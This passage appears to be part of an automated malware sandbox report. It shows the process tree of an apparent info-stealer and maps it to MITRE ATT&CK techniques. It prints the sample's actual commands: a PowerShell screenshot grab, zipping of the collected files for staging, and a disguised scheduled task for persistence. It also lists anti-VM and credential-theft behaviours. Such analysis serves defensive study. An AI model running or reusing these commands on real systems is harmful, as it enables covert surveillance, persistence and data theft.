        powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_YEdi96VFf.zip' -Force""
      4⤵
      PID:3436
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_YEdi96VFf.zip' -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4064
- C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /Create /TN "Usermode Disk Driver Host" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE678.tmp" /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3800 -ip 3800
1⤵
PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery